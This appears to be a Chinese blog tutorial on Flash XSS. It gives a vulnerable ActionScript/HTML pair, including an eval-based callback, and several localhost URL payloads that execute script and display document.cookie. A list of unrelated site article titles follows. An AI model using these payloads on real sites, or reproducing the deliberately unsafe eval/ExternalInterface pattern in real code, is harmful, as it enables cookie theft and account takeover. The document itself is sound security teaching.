Flash XSS
示例:
创建一个测试flash,代码如下,导出swf文件
//取m参数 var m=_root.m; //取showInfo参数 var showInfo=_root.showInfo; //调用html中Javascript中的m方法,参数为showInfo flash.external.ExternalInterface.call(m,showInfo); |
ExternalInterface
在HTML中引用flash:
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Flash XSS</title> </head> <script> function showInfo(info){ eval(info) } </script> <body> <embed src="test.swf?m=showInfo&showInfo=alert(document.cookie)" allowscriptaccess="always"></embed> <div id=info></div> </body> </html> |
成功执行执行攻击代码,弹出cookie。
上面演示的执行,其实还可以直接执行反射XSS。
由于Javascript中可以使用匿名函数function(){代码}进行执行。
如:
http://localhost:8080/JavaTest/xss/test.swf?m=function(){alert(/xss/)}&showInfo=s
成功弹出,试试弹出cookie。
http://localhost:8080/JavaTest/xss/test.swf?m=function(){alert(document.cookie)}&showInfo=s
没有弹出任何东西,因为这里没有document对象,这里我们利用location.href来生成HTML代码
http://localhost:8080/JavaTest/xss/test.swf?m=function(){location.href="javascript:'<script>alert(document.cookie)</script>'"}&showInfo=s
将攻击代码输入到HTML中了。
成功执行了弹出cookie。
最新文章
- js判断undefined类型
- Count Complete Tree Nodes
- 1644 免费馅饼 题解(c++)(S.B.S.)
- [翻译] 使用ASP.NET MVC操作过滤器记录日志
- Flex使用宋体渲染越南语显示错误
- How Tomcat Works(十六)
- float闭合(清除浮动)和CSS HACK
- Tomcat 配置问题总结
- PureMVC(JS版)源码解析(六):MacroCommand类
- sqlite3经常使用命令&;amp;语法
- 团队作业7——第二次项目冲刺(Beta版本12.08-12.10)
- Java 反射详解 转载
- python 迭代器、生成器、枚举的使用
- int与integer的区别
- MVC 自定义 错误页面
- SAP 生产订单变更管理 OCM Order Changement Management
- C++学习(二十二)(C语言部分)之 项目扫雷实例
- Sqlserver的Transaction做Rollback的时候要小心(转载)
- linux 查看安装软件位置(持续跟新)
- 《modern-php》 - 阅读笔记 - 最佳实践